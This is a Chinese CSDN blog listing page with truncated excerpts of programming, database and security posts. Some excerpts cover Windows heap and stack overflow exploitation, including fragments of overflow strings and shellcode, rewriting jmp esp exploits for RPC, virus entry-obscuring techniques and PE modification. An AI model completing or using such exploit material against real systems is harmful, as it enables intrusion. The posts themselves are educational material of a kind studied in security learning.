要饭's Blog_kgdiwss_CSDN博客-原创文章,杂七杂八,移动安全领域博主

kgdiwss

码龄16年

于 2004-10-31 加入CSDN

获得成就

获得19次点赞
内容获得391次评论
获得80次收藏

荣誉勋章

TA的专栏

发些c/c++/vc/驱动/网络安全的好书和资料

东西多啊，大家自已下吧。C/C++/VC类：C陷阱与缺陷[PDF] http://bbs.80dnst.com/thread-124-1-1.html易学C++ 网络版[PDF] http://bbs.80dnst.com/thread-120-1-1.html 汇编语言全接触[CHM] http://bbs.80dnst.com/thread-119-1-1.htmlWind

发布博客于 14 年前

Windows TDI过滤驱动开发(PDF)

目　录
(0) TDI概要
(1) 准备工作
(2) TDI设备与驱动入手
(3) 绑定设备
(4) 简单的处理请求
(5) 基础过滤框架
(6) 主要过滤的请求类型
(7) CREATE的过滤
(8) 准备解析ip地址与端口
(9) 获取生成的IP地址和端口
(10) 连接终端的生成与相关信息的保存
(11) TDI_ASSOCIATE_ADDRESS的过滤
(12) TDI_CONNECT的过滤
(13) TDI_SEND,TDI_RECEIVE,TDI_SEND_DATAGRAM,TDI_RECEIVE_DATAGRAM
(14) 设置事件
(15) TDI_EVENT_CONNECT类型的设置事件的过滤
(16) 一个传说中的问题
(17) 收尾与清理的工作

application/x-rar

发布资源于 14 年前

NDIS函数简明手册

函数描述
无连接微端口的上层函数
DriverEntry 由操作系统调用来激活和初始化微端口驱动程序
MiniportAllocateComple 调用它来指示以前调用的NdisMAllocateMemoryAsync 已经完成
MiniportCheckForHang 检查NIC的内部状态
MiniportDisableInterrupt 禁止NIC产生中断
MiniportEnableInterrupt 允许NIC 产生中断
MiniportHalt 重新分配和重新注册NIC占用的资源并且终止NIC以使它不再有用
MiniportHandleInterrupt 延期用来完成I/O 中断函数的执行
MiniportInitialize 出始化NIC
MiniportISR 作为NIC中断服务例程以高权值运行
MiniportQueryInformation 查询微端口驱动程序的性能和当前状态
MiniportReconfigure 未使用
MiniportReset 对NIC 发出一个硬件重置
......

application/x-rar

发布资源于 14 年前

IA-32 Intel® Architecture Software Developer’s Manual(intel指令,PDF版)

朋友从INTEL官方弄来的指令手册，有指令的详细介绍，全英文PDF版。

application/x-rar

发布资源于 14 年前

简明批处理教程(PDF版)

本人将网上下载的完整DOC文档转成的PDF版.

application/x-rar

发布资源于 14 年前

Window 消息大全使用详解(PDF版)

介绍windows消息的资料,我也是从CSDN上下下来的,不过它原来是DOC文件,我转成了PDF文件,需要的朋友下吧,免费的.
^@^

application/x-rar

发布资源于 14 年前

循序渐进学习使用WinPcap(PDF版)

winpcap使用系列-循序渐进学习使用WINPCAP

application/x-rar

发布资源于 14 年前

跟我一起学Makefile(PDF版)

跟我一起写 Makefile<br>作者：陈皓<br>整理：祝冬华

application/x-rar

发布资源于 14 年前

永久去除TIMPlatform.exe办法

腾讯QQ里都有个TIMPlatform.exe文件，而且每次开QQ都用自动开启它，多了系统一个进程，也占用了内存。于是我把它删掉了，好像没有什么影响~TIMPlatform.exe是QQ和Tencent Messenger共同使用的外部应用开发接口管理程序，属于QQ 2004不可或缺的底层核心模块。如果删除该程序，QQ 2004将丧失与周边功能模块以及外部应用程序相互调用的

发布博客于 14 年前

珍惜生活(鲁迅)

有些人毕生追求的却是有些人与生俱来的，在生命完结的时候，有些人得到了他所毕生追求的而有些人却失去了他与生俱来的。在年轻的时候永远不要停息生命的脚步，永远不要安于现状，或许一个人可以失去美丽的青春，因为青春终究是会失去的，但是时间是不会停止的。永远不要失去自己的梦想和前进的方向，永远不要失去自己的人格与价值的尊严，要永远对得起自己和自己生活的每一天，永远，永远……

发布博客于 14 年前

Linux下Tomcat的安装

１．下载Tomcat在下面的地址下载Tomcat的二进制版 http://mirrors.ccs.neu.edu/Apache/dist/jakarta/tomcat-4/binaries/即下载文件 tomcat-4.1.18.tar.gz2. 安装首先解压缩 gunzip tomcat-4.1.18.tar.gz tar -zx

发布博客于 14 年前

linux下Java环境的配置

现在用linux的朋友越来越多了，前几天就有两个朋友问我linux下怎么配置java环境，我想还有很多朋友想了解学习这方面的东西，就写一个完全一点的linux java环境配置吧，希望对大家有帮助。一. 下载jdk5.0 for linux　　到sun的主页 http://java.sun.com/j2se/1.5.0/download.jsp 下载jdk安装文件jdk-1_5_0

发布博客于 14 年前

解析Java体系结构对信息安全的支持

Java语言拥有三大特征：平台无关性、网络移动性和安全性，而Java体系结构对这三大特征提供了强大的支持和保证，本文着重介绍Java体系结构对支持信息安全的原理和使用方法。　　Java体系结构　　Java的体系结构如下图所示，首先Java的源代码Java文件由编译器编译成Java的二进制字节码class文件，然后class文件由Java虚拟机中的类装载器进行加载，同时类装载器还会

发布博客于 14 年前

烂公司与好公司的区别

个人感觉说的蛮有道理的,特此收藏一下.烂公司是一个老板，花钱招了一帮人，当然有聪明人，也有笨蛋，不过大家都要装成笨蛋，然后共同看老板一个人的表演，并都要表现的衷心的同意和拥护，给------老板看!好公司是一个老板，花钱招了一帮人，当然有聪明人，也有笨蛋，不过大家都要变的聪明，然后在公司这个大舞台中，所有人自己演绎出最精彩的东东，给-----客户看。

发布博客于 14 年前

如何用.NET创建Windows服务

我们将研究如何创建一个作为Windows服务的应用程序。内容包含什么是Windows服务，如何创建、安装和调试它们。会用到System.ServiceProcess.ServiceBase命名空间的类。什么是Windows服务？　　Windows服务应用程序是一种需要长期运行的应用程序，它对于服务器环境特别适合。它没有用户界面，并且也不会产生任何可视输出。任何用户消息都会被写进Wi

发布博客于 14 年前

TCP的三次握手

TCP的三次握手分类:网络分析　　第一步:请求方向服务方发送SYN，表示想发起一次TCP连接。我们假定这次的序列号是某个数值X ,初始的ack号为0Trust ->Target SYN SEQ:X ACK:0　　第二步:服务方产生SYN，ACK响应，并向请求方发送ACK， ACK的值为X+1，表示数据成功接收到，且告知下一次希望接收到字节的SEQ是X+1。同时，服务方向请求方发

发布博客于 14 年前

三星D608水货K4版本彩信设置

K4水货版本，无法使用指令自动设置，按如下设置：彩信设置:短信--设定--多媒体信息--多媒体信息设定--服务器设定---1--选择模式名:彩信服务器地址:http://mmsc.monternet.com代理服务器:有效GPRS设定按OK进入IP地址:10.0.0.172端口:80接入点名称:cmwap用户名:空密码:空GPRS设置:浏览器--代理服务器设定--设定1手机电模式名:

发布博客于 14 年前

项目刷新失败，无法从服务器中检索文件夹信息的解决办法

vs2003打开一个项目时，出现了“项目刷新失败，无法从服务器中检索文件夹信息”的错误，解决如下:该问题是由于缓冲造成的。删除 Documents and Settings下对应用户的文件夹下的VSWebCache的文件夹中对应的项目目录即可。如:C:/Documents and Settings/登陆名/VSWebCache

发布博客于 14 年前

Javascript中Math对象使用心得

Math对象方法Math.ceil(x) 返回大于等于x的最小整数；Math.floor(x) 返回小于等于x的最大整数；Math.round(x) 将一个小数四舍五入为整数；Math.pow(x,y) 幂运算，返回以x为底，y为指数的幂；经常遇到的情况是需要取若干位有效数字的小数于是给Math对象写了以下方法Math.hold(x

发布博客于 14 年前

如何在sql-server里更改列名？

sp_rename a表.列名b,改成的C,column 格式为：sp_rename tablenames.[contact title], new_title, COLUMN

发布博客于 14 年前

软件版本号命名规则详解

大家或许已经注意到了，网上下载的软件常常标有Beta版、Demo版等软件版本信息，这些版本信息实际上有其内在的含义。下面我们就将一些常见的软件版本信息向大家做一详细的介绍。?测试版与演示版α版此版本表示该软件仅仅是一个初步完成品，通常只在软件开发者内部交流，也有很少一部分发布给专业测试人员。一般而言，该版本软件的Bug较多，普通用户最好不要安装。β（Beta）版该

发布博客于 14 年前

DataGrid控件中模板列的服务器控件，怎么添加事件代码

上面是datagrid 中的一段模板列代码，我们现在有两种方法添加事件代码1.CommandName="test">利用commandnameprivate void DataGrid1_ItemCommand(object source, System.Web.UI.WebControls.DataGridCommandEventArgs e) { if(e.Comma

发布博客于 14 年前

MSIL指令速查表

最初阅读IL的时候，很多指令会记不住，你把以下这两个表格打印下来，备在案前，可供速查！最初我阅读IL时，就是这么做的。后来我教别人反编译，都要别人先打印这份表格。自己查文档也可以获得一下资料。不过，或许我整理的这个表格，速查更方便!下载地址：http://www.cnblogs.com/Files/jobs/msil.rarBase Instructions

发布博客于 15 年前

MSIL 初级读本第二部分：局部变量

声明：本文译自 Kenny Kerr 的 blog，如果大家有更好的 MSIL 入门文章也欢迎推荐，谢谢。在本文的第二部分里，我将探讨一下局部变量的使用。为了展示这个过程，让我们来写一个将两数相加的简单程序。在 MSIL 方法中，使用 .locals 指示符来声明局部变量 .local init( int32 first,

发布博客于 15 年前

DataBinder.Eval()的两种用法

第一种用法也是最常用的用法，估计相关的资料都比较常见；一般在.aspx文件中使用1# DataBinder.Eval(Container.DataItem,"yourColname")#>第二种是直接在DataGird的ItemBound事件里使用DataBinder.Eval().这种用法十分灵活，如果你需要对目标数据进行一些加工处理，这种方法应该能够满足。当然，也可以使用

发布博客于 15 年前

WORD转PDF时提示"PDFMaker文件遗失"的解决办法

自己今天在打算将word文档转换为pdf的时候，报错“PDFMaker文件遗失”找到以下解决方法：具体步骤如下：1，首先关闭M$ Word。2，打开目录C:/Documents and Settings/weizi/Application Data/Microsoft/Templates(weizi是当前登录名；如果不能显示Application Data目录，则显示隐藏

发布博客于 15 年前

PE文件添加节显示启动信息

闲来写了个修改PE的小程序,主要是演示和实践PE操作和重定位的概念,实在没事情的时候,可以看看,你将会看到PE文件实际上很简单!当然,首先得作好被我的垃圾代码扫了雅兴的准备. 这里利用的是我前面介绍的方法的手动查找API的方法.这个东西修改PE并在最后加上一节,节名.hum,被附加程序启动前会显示一个MsgBox,以显示一些信息,你可以用来给自己破的软件来一个所谓的版权信息(我最

发布博客于 15 年前

EPO技术简介

by Hume/CVC.GB　本文首发于2003年第8期《黑客防线》杂志“CVC病毒专栏”1.什么是EPO？　EPO是EntryPoint Obscuring技术的简写，意即入口模糊技术，该技术改变了传统的修改PE头部的入口点，使其指向病毒代码入口而使病毒代码得以执行的典型方法。 2.为什么需要EPO？　这要从反病毒技术的发展谈起，随着当今反病毒技术的不断提

发布博客于 15 年前

PE结构图

图片来源于网络.

发布博客于 15 年前

关于officescan和瑞星同时安装

公司里安装了officescan,可是感觉效果不好,所以自已下了个瑞星,安装过程中发现,瑞星装完后开启监控就会特别的慢.安装卡巴斯基2005版也是这样. 后来经过实验发现,当文件监控打开时,就会特别的慢,其它监控打开都不会,于是我将officescan禁止启动,只启动瑞星,然后再打开文件监控,结果一切正常,看来开了officescan后,再开瑞星,瑞星的文件监控不能打开.

发布博客于 15 年前

.net方法参数注释编写实例[原创]

主要是example,code标记等的运用,怕忘了,所以记录一下. #region GetLatestJobInfo /// ///获取最新的职位信息 /// /// /// ///宋体" size="2">

发布博客于 15 年前

老外对vista的一句有趣评价

最近心血来潮，天天逛英文网站和论坛，看到这句话：Vista is going to be a seriously shitty OS as its like XP with more bullshit thrown in that you wont ever need.One feature ive heard is "adverts from M$ direct to your d

发布博客于 15 年前

调用web services提示Access Denied的解决办法[整理]

现象:asp.net中调用web services时提示错误:请求因 HTTP 状态 401 失败：Access Denied。将web services放到另一台服务器问题又不存在该问题。解决办法:1.新建方法:#region GetCredentialCache/// /// 获取CredentialCache/// 解决访问web service时提示没

发布博客于 15 年前

删除msn共享文件夹

依次点击“开始/运行”，然后输入“CMD”命令，在弹出的命令提示符窗口中输入“regsvr32 /u "C:/Program Files/MSN Messenger/fsshext.dll "”（假设MSN安装目录为：C:/Program Files/MSN Messenger），回车后就会弹出该模块被正确解除的提示，再打开“我的电脑”看一下，MSN共享文件夹图标就被删除了。

发布博客于 15 年前

一个统计报表的SQL语句

select t.lngShopID,case when t.lngShopID = 6666666666 --and t.lngDateID = 7777777777 then 总计 else s.strShopName end as strShopName,case when t.lngShopID = 6666666666 --and t.

发布博客于 15 年前

自定义水晶报表的外观

1、外观：设置 Crystal Report Viewer 的属性：BestFitPage 布尔值。获取或设置页面视图是大小合适还是用滚动条进行裁剪。配合设置 Width、Height 来实现无空白和无滚动条的显示！DisplayGroupTree 布尔值。获取或设置树视图是可见还是隐藏。 DisplayPage 布尔值。获取或设置工具栏是可见还是隐藏。 DisplayToolbar 布尔值。获取

发布博客于 15 年前

关于父框架刷新问题

父页面是包含了2个iframe框架的网页,而我在其中的一个iframe里使用了window.open ,调用出一个子窗口页面,现在的问题是,在子窗口页面关闭的同时,要刷新父框架中的页面：. self.opener.location.reload();window.close()-->

发布博客于 15 年前

delphi 里的@^#等符号都是什么意思？

@:取址运算符;varint:integer;p:^integer;new(P);int:=24;p:=@int;dispose(P);^:指针的引用解析操作符;varpint:^integer;new(pint);showmessage(inttohex(integer(@pint),8);pint^:=$ff;showmessage(inttohex(pint^,4));#:ASCII码

发布博客于 15 年前

无法安装SQL Server 2000的解决办法之一

在安装时出现错误提示如下：　　“以前的某个程序安装已在安装计算机上创建挂起的文件操作。运作安装程序之前必须重新启动计算机。”　　　　重新启动机器是绝对没有用的，上网找了很多文章，都是说安装过缺载没缺干静，但是我系统都重装了，但我也用优化大师清理一下注册表和垃圾文件，不过没好用。后来终于在网上找到了一个方法，我没报成功的希望，但还是试一试，没想到还真好用，放到blog上跟大家分享。方法如下：　

发布博客于 15 年前

delphi 单元文件详释

unit UnitInfo;//单元文件名，也是一个类说明的开始interface //接口部分，在此处声明的过程、变量可为其他单元所用uses //若本单元要用到其他的单元，则要把它的单元文件名放入到uses子句后 Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,

发布博客于 15 年前

解决水晶报表无法显示图片的方法

水晶报表能显示表格,但是图片显示不出来,解决办法如下:在网站根目录下新建虚拟目录：crystalreportwebformviewer2路径为：x:/Program Files/Microsoft Visual Studio .NET 2003/Crystal Reports/Viewers X为.NET安装的盘符.

发布博客于 15 年前

DELPHI 取Run下所有值

procedure TForm1.FormCreate(Sender: TObject);varnum1,num2:integer;reg:Tregistry;nums1:Tstringlist;nums2:Tstringlist;I:integer;beginlist.Clear;nums1:=Tstringlist.Create;nums2:=Tstringlist.Creat

发布博客于 15 年前

在Delphi中轻松操作注册表

在应用程序中，经常需要对注册表进行各种操作，如将程序名称、安装路径等信息保存到注册表中。Delphi对相应API函数做了进一步封装，使得在应用程序中操作注册表更加简单。 1、原理Delphi提供了TRegistry类，它直接继承自TObject类，主要属性有：RootKey等，主要方法有：Create，CreateKey(Key)， OpenKey(Key,CanCreate)

发布博客于 15 年前

Delphi编译错误中文手册

******************************* * 编译错误信息 * ******************************* ; not allowed before ELSE ElSE前不允许有“;” clause not allowed in OLE automation section 在OLE自动区段不允许“”子句 is not a

发布博客于 15 年前

Delphi 超快的字符串替换函数

//function QuickPos(const Substr, S: WideString; MatchesIndex: Integer = 1): Integer; //function QuickPosBack(const Substr, S: WideString; MatchesReverseIndex: Integer = 1): Integer; function _In

发布博客于 15 年前

Delphi 函数大全

名称类型说明----------------------------------------------------------------------------------Abort 函数引起放弃的意外处理 Abs

发布博客于 15 年前

8086CPU中和标志寄存器相关的东东

ZF (Zero Flag): 零标志位。它记录相关指令执行后，其结果是否为0。 PF (Parity Flag): 奇偶标志位。它记录相关指令执行后，其结果的所有二进制位中1的个数是否为偶数。 SF (Sign Flag): 符号标志位。它记录相关指令执行后，其结果是否为负。 CF (Carry Flag): 进位标志位。它记录了无符号数运算结

发布博客于 15 年前

利用vc 6.0目录下的cl.exe直接编译程序的方法[整理]

1.在“我的电脑--属性--高级--环境变量”中，添加如下变量：INCLUDE D:/Program Files/Microsoft Visual Studio/VC98/IncludeLIBD:/Program Files/Microsoft Visual Studio/VC98/Lib PATHX:/Program Files/Microsoft Visual Studio/Com

发布博客于 15 年前

文件夹右键直接进入CMD的方法

把以下内容保存为cmd.reg：Windows Registry Editor Version 5.00[HKEY_CLASSES_ROOT/Directory/shell/cmd]@="命令提示符"[HKEY_CLASSES_ROOT/Directory/shell/cmd/command]@="cmd.exe /k /"cd %L/" " 然后运行cmd.reg，在询问是否导入

发布博客于 15 年前

OllyDbg命令行命令

以下命令适用于 OllyDbg 的命令行插件 Cmdline.dll（显示于程序的插件菜单中）===============================================================命令行插件支持的命令CALC判断表达式WATCH添加监视表达式AT在指定地址进行反汇编FOLLOW跟随命令ORIG反汇编于 EIPDUMP在指定地

发布博客于 15 年前

Sql Server基本函数

1.字符串函数长度与分析用 datalength(Char_expr) 返回字符串包含字符数,但不包含后面的空格 substring(expression,start,length) 不多说了,取子串 right(char_expr,int_expr) 返回字符串右边int_expr个字符字符操作类 upper(char_expr) 转为大写 lower(char

发布博客于 15 年前

逻辑运算指令

5.2.4 逻辑运算指令逻辑运算指令是另一组重要的指令，它包括：逻辑与(AND)、逻辑或(OR)、逻辑非(NOT)和异或指令(XOR)，逻辑运算指令也是经常使用的指令。1、逻辑与操作指令AND(Logical AND Instruction)指令的格式：AND　Reg/Mem, Reg/Mem/Imm受影响的标志位：CF(0)、OF(0)、PF、SF和ZF(AF无定义)指令的功能是

发布博客于 15 年前

传送—填充指令

传送—填充指令是把位数短的源操作数传送给位数长的目的操作数。指令格式如下：MOVSX/MOVZX Reg/Mem, Reg/Mem/Imm　　　　　;80386+其中：80386+表示80386及其之后的CPU，其它类似符号含义类同，不再说明。指令的主要功能和限制与MOV指令类似，不同之处是：在传送时，对目的操作数的高位进行填充。根据其填充方式，又分为：符号填充和零填充。传送

发布博客于 15 年前

破解预备知识

一.机械码,又称机器码.ultraedit打开,编辑exe文件时你会看到许许多多的由0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F组成的数码,这些数码就是机器码.修改程序时必须通过修改机器码来修改exe文件.二.需要熟练掌握的全部汇编知识(只有这么多)不大容易理解,可先强行背住,混个脸儿熟,以后慢慢的就理解了cmp a,b 比较a与bmov a,b 把b的值送给aret 返回主程序

发布博客于 15 年前

买水货三星手机注意事项

核对手机IMEI码，应先输入*#06#，查看手机内存中的IMEI码，记住这个号码，然后输入*2767*3855#进行码片复位，手机会自动重启，最后再输入*#06#，查看这个IMEI码有没有改变，如果这个号码与手机背贴、外包装盒上的IMEI码一致，且型号核准号码与手机型号一致，就证明是原厂正宗货。如果不一致，或者变成了一串乱码，或指令不被执行，则证明该手机要么是水改机，要么是机。后者

发布博客于 15 年前

DataGrid中日期格式化方法

在"数据格式设置表达式 "中填入:表达式效果说明{0:d}

发布博客于 15 年前

VMware中windows 2000 server 启动softice时候的问题

作者: sunwear 　　在vmware GSX SERVER 上装了windows 2000 server sp4 后。没有装显卡驱动，望着640*480 的16位色屏幕，感觉很不舒服也不适应，为了图方便就安装了VMWARE TOOLS，VM工具包里面自带了显卡驱动，这样就好多了。　　我这次装windows2000的目的就是为了装SOFTICE

发布博客于 15 年前

显示数据库中表结构的SQL语句

SELECT (case when a.colorder=1 then d.name else end) N表名, a.colorder N字段序号, a.name N字段名, (case when COLUMNPROPERTY( a.id,a.name,IsIdentity)=1 then √else end) N标识, (case when (SEL

发布博客于 15 年前

关于《Windows下的HEAP溢出及其利用》一文的疑惑

作者：∮明天去要饭看了isno写的《Windows下的HEAP溢出及其利用》一文，虽然原理上能理解，但是还是有些疑惑，请各位朋友指点一下，原文地址：

发布博客于 15 年前

米的妈妈是谁？

米的妈妈是谁？米的爸爸是谁？米的外婆是谁？米的外公是谁？答：米的妈妈是花，因为花生米；米的爸爸是蝶，因为蝶恋花；米的外婆，也就是妈妈的妈妈是妙笔，因为妙笔生花；米的外公是爆米花，因为他即抱过花又抱过米。

发布博客于 15 年前

windows进程中的内存结构

在阅读本文之前，如果你连堆栈是什么多不知道的话，请先阅读文章后面的基础知识。接触过编程的人都知道，高级语言都能通过变量名来访问内存中的数据。那么这些变量在内存中是如何存放的呢？程序又是如何使用这些变量的呢？下面就会对此进行深入的讨论。下文中的C语言代码如没有特别声明，默认都使用VC编译的release版。首先，来了解一下 C 语言的变量是如何在内存分部的。C 语言有全局变量(Globa

发布博客于 15 年前

我理解的windows异常处理

申明： 1.本文大部份内容参考《A Crash Course on the Depths of Win32 Structured Exception Handling》，我只是对顺序进行了一些调整，同时加入了一些我的理解，所以不敢自称原创。 2.结构定义位置中的X:指的是VC6.0的安装盘符。首先，当线程发生异常时，操作系统会将这个异常通知给用户使用户能够得知它的发生。更特别的

发布博客于 15 年前

总结windows下堆溢出的三种利用方式(2)

的数据所指向的地址。我们可以控制这两个数据。可见第二种方式的前提有三个： 1)构造堆（buf2）的flag必须含有HEAP_ENTRY_BUSY和HEAP_ENTRY_VIRTUAL_ALLOC，可以设成0xff 2)构造堆的flag前面那个字节要比0x40小 3)构造堆的上一个堆（即buf1）的长度必须大于或等于0x18+0x08即32个字节，否则在关键点三处，ESI会指向我们不能控制的区域，

发布博客于 15 年前

总结windows下堆溢出的三种利用方式(1)

main (int argc, char *argv[]) { char *buf1, *buf2; char s[] = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/x03/x00/x05/x00/x00/x01/x08/x00/x11/x11/x11/x11/x21/x21/x21/x21"; buf1 = (char*)malloc (32); /* 分配两块内存

发布博客于 15 年前

反汇编深入分析函数调用

函数：int fun(int a, int b) { char var[128] = "A"; a = 0x4455; b = 0x6677; return a + b;}int main() { fun(0x8899,0x1100); return 0;}F11跟踪到fun,alt+8看反汇编代码：00401078

发布博客于 15 年前

SQL Server 2000启动1069错误

　　首先介绍网络上常用的两种解决方法：　　1.我的电脑--控制面板--管理工具--服务--右键 MSSQLSERVER--属性--登陆--登陆身份--选择"本地系统帐户"　　或:　　2.我的电脑--控制面板--管理工具--服务--右键 MSSQLSERVER--属性--登陆--登陆身份--选择"此帐户"--密码和确认密码中输入你修改后的administrator密码.　　两

发布博客于 15 年前

婚前婚后对老婆问题不同回答婚前

　　女：你原先有过女朋友吗？　　男：十年生死两茫茫，不思量，自难忘。　　女：死了？怎么死的？　　男：山无陵，江水为竭，冬雷阵阵夏雨雪。　　女：哦，是天灾。那这些年你怎么过来的？　　男：满面尘灰烟火色，两手苍苍十指黑。　　女；唉，不容易。那么你看见我的第一感觉是什么？　　男：忽如一夜春风来，千树万树梨花开。　　女：(红着脸)有那么好？　　男：糟粕所传非粹美，丹

发布博客于 15 年前

CheckBoxList控件基本用法

上班没事,就随便写一下,初学者有用 -- by:∮明天去要饭s1.绑定数据 this.lngCatalogID.DataSource = dt; //这里我绑到DataTable上了. this.lngCatalogID.DataTextField = "strCatalogName"; //前台看到的值,也就是CheckBoxList中显示出来的值 this.lngCa

发布博客于 15 年前

利用异常处理执行shellcode实例

在《Q版缓冲区溢出教程》中有一个例子，如下：#include #include char name[] = "/x41/x41/x41/x41" //name[0] - name[3] "/x41/x41/x41/x41" //name[4] - name[7] "/x41/x41/x41/x41" //ebp"/x12/x45/xfa/x7f

发布博客于 15 年前

叫两招对付银行里态度恶劣的工作人员～很有效哦

◆◆　大家都来声讨银行的作为吧哥哥结婚叫我去换50张20的rmb发小红包用。拿了1k去银行换，sb态度极其不好的说“没有，不能换给你” 态度实在恶劣啊。我十分凶恶的反问“你再说一次”家伙很牛的说“就是没有” 我说“你=着”sb说“你威胁我啊” 我拿了身份证说“开户，存1k”. 结束了,我说“再提20”连着提了二次20。 sb说“侬萨意思啊？” “cn闹钞票，闹50趟再销户不来三啊” sb灰溜溜

发布博客于 15 年前

美女接电话是怎么样被气死的

一天，美女小C一个人在寝室里看书，突然电话铃响，小C提起电话， “喂 ” 了几声，对方却始终没回音。下午五点时，类似的电话又打来了，这已经是当天的第五次了，小C再也忍耐不住：讨厌！变态！第二天中午，大家正在寝室吃饭，电话又来了，小C抢先提起来：**，你再不说话我就不客气啦！只是对面传来一个标准的性感的男声： “小姐，你好！这里是201电话服务中心，因为系统昨日故障，影响了您部分通话，我们向您表

发布博客于 15 年前

一个女生是怎么样在QQ上被一个男生气死的

　　＞你看过一本书叫十万个为什么吧！我是那本书的作者！　　　　＞ 2001-12-17 20:53:08 番茄脸红红　　＞骗人！~ 　　　　＞ 2001-12-17 20:53:35 飞刀　　＞没有！我向上帝保证！　　　　＞ 2001-12-17 20:54:05 番茄脸红红　　＞呵呵！　　＞你上学还是上班啊？　　　　＞ 2001-12-17 20:54:14 飞刀　　＞

发布博客于 15 年前

奔腾指令速查手册

奔腾指令速查手册　指令首字母快速索引： A B C D

发布博客于 15 年前

轻松将jmp esp方式改写为jmp ebx方式

转载：Q版黑客溢出教程一书写这篇文章，希望能给想我一样的初学缓冲区溢出的菜鸟一些帮助，因为到现在的确还没找到介绍这类的文章。首先，介绍在堆栈溢出中，我们的两种利用方式—jmp esp和jmp ebx；接下来，说明了其转化的简单方法；最后给了两个实际例子，将isno写的.printer利用代码和flashsky写的RPC利用代码改写成jmp ebx的方式，以实现对win2000 sp0-sp4全版本

发布博客于 15 年前

寄存器中文-英文命名对照表

类型中文名称英文名称二进制码

发布博客于 15 年前

汇编指令手册

一、数据传输指令　　它们在存贮器和寄存器、寄存器和输入输出端口之间传送数据.　　1. 通用数据传送指令.　　　　MOV　　传送字或字节.　　　　MOVSX　先符号扩展,再传送.　　　　MOVZX　先零扩展,再传送.　　　　PUSH　　把字压入堆栈.　　　　POP　　把字弹出堆栈.　　　　PUSHA　把AX,CX,DX,BX,SP,BP,SI,DI依次压入堆栈.　　　　POPA　　把DI,SI

发布博客于 15 年前

汪国真:《热爱生命》和《跨越自已》

热爱生命汪国真我不去想是否能够成功既然选择了远方便只顾风雨兼程我不去想能否赢得爱情既然钟情于玫瑰就勇敢地吐露真诚我不去想身后会不会袭来寒风冷雨既然目标是地平线留给世界的只能是背影我不去想未来是平坦还是泥泞只要热爱生命一切，都在意料之中跨越自己汪国真我们可以欺瞒别人却无法欺瞒自己当我们走向枝繁叶茂的五月青春就不再是一个谜向上的

发布博客于 15 年前

一个C的实验及疑惑

#include#include#includestruct STU{ char name[20]; char stuno[10]; int age; int score;}stu[50];typedef struct STU ElemType;struct LNODE{ ElemType data; struct LNODE *next;};typedef struct LN

发布博客于 15 年前

创建链表的源码

/* ========================== Program Description ========================== *//* 程序名称：createList.c

发布博客于 15 年前

链表的操作

链表是数据结构中的一个重要组成部分，对链表操作的熟练度怎么要求都不过分。（只有部分核心代码）主要内容： 1）链表的建立 2）链表的释放 3）链表的查找 4）链表中节点的插入 5）链表中节点的删除 6）链表的反转 7）两个链表的连接#define MAX 15/* 节点声明 */struct list{ int number; int name[MAX];

发布博客于 15 年前

线性链表的操作

#include#include#include#define ERROR 0#define OK 1#define EQUAL 1#define OVERFLOW -1#define LIST_INIT_SIZE 100#define LISTINCREMENT 10struct STU{ char name[20]; char stuno[10]; int age; int sc

发布博客于 15 年前

数据结构题集--数组(二维数组)

设计一个矩阵相乘的程序假设有 1 5 7 3 3 9 1 4 1 4A= 3 6 3 9 B= 5 6 7 9 0 3 1 2 8 7 3 2 7 2 5 6 0 3 1 9 9 7 4 7 8 0 3 2 5 4求出A

发布博客于 15 年前

彻底搞定C指针－指向另一指针的指针

一．回顾指针概念：早在本系列第二篇中我就对指针的实质进行了阐述。今天我们又要学习一个叫做指向另一指针地址的指针。让我们先回顾一下指针的概念吧！当我们程序如下申明变量：short int i;char a;short int * pi;程序会在内存某地址空间上为各变量开辟空间，如下图所示。内存地址→6 7 8 9 10 11 12 13

发布博客于 15 年前

类似华容道游戏源码

/* puzzle.cAuthor: zmofun 1999.12.7All rights is reserved. */#include #include #include #include#define PSTARTX 30#define PSTARTY 6#define PWIDTH 20#define PHEIGHT 11puzzlemain(){

发布博客于 15 年前

数据结构之:线性表的顺序表示和实现

一、线性表的顺序表示用一组地址连续的存储单元依次存储线性表的数据元素。C语言中的数组即采用顺序存储方式。 2000:0001

发布博客于 15 年前

瑞星工程师详解病毒与网络安全(视频)

第一集：计算机病毒有那些特性? 第二集：病毒都有哪些种类？第三集：拿什么技术来反病毒？第四集：杀毒软件需要用户设置吗？第五集：病毒/反病毒技术有什么趋势？第六集:用户对病毒需走出哪些误区?第七集:安了杀毒软件还要安装防火墙吗?第八集：黑客常用的攻击方式都有哪些？第九集：用户如何预防黑客/病毒攻击？第十集：网络版杀毒软件带给我们什么？

发布博客于 15 年前

很搞笑的一些句子

转自：“天涯社区”　　1.柏芝你走吧，我舍不得韩红！！！　　　　2.按猪的审美观，我基本算得上是个帅哥~ 　　3.我不是你想象中的那么完美那么坚强，金钱和美女就足以把我征服！　　4.见到我以后你会突然发现——原来帅也可以是这样的具体呀~ 　　5.姑姑，十六年后我们断肠崖见，到时候别忘了给我发短信！　　6.自从两个妓女自称是某名牌大学的毕业生后，我现在一般都自称文盲！　　7

发布博客于 15 年前

在SQL Server中快速删除重复记录(多图)

文/夏翔开发人员的噩梦——删除重复记录　　想必每一位开发人员都有过类似的经历，在对数据库进行查询或统计的时候不时地会碰到由于表中存在重复的记录而导致查询和统计结果不准确。解决该问题的办法就是将这些重复的记录删除，只保留其中的一条。　　在SQL Server中除了对拥有十几条记录的表进行人工删除外，实现删除重复记录一般都是写一段代码，用游标的方法一行一行检查，删除重复的记录。

发布博客于 15 年前

成年人必看的五个故事[来源于CSDN论坛]

1、情况不同一只小猪、一只绵羊和一头乳牛，被关在同一个畜栏里。有一次，牧人捉住小猪，牠大声号叫，猛烈地抗拒。绵羊和乳牛讨厌牠的号叫，便说：「他常常捉我们，我们并不大呼小叫。小猪听了回答道：「捉你们和捉我完全是两回事，他捉你们，只是要你们的毛和乳汁，但是捉住我，却是要我的命呢! 立场不同、所处环境不同的人，很难了解对方的感受；因此对别人的失意、挫折、伤痛，不宜幸灾乐祸，而应要有关怀、了解的心

发布博客于 15 年前

windows和linux下的c语言/网络/网络编程面试题收集[更新:2006.6.8]

以下试题和答案均由明天去要饭从网上收集,仅供参考.如果发现错误或有更好的答案请回复,本人将对答案进行更新.基础部份:1.下列程序在32位linux或unix中的结果是什么？ func(char *str){ printf("%d",sizeof(str)); printf("%d",strlen(str));}main(){ char a[]="123456789";

发布博客于 15 年前

sql入侵中用到的一些命令[更新:2006.5.23]

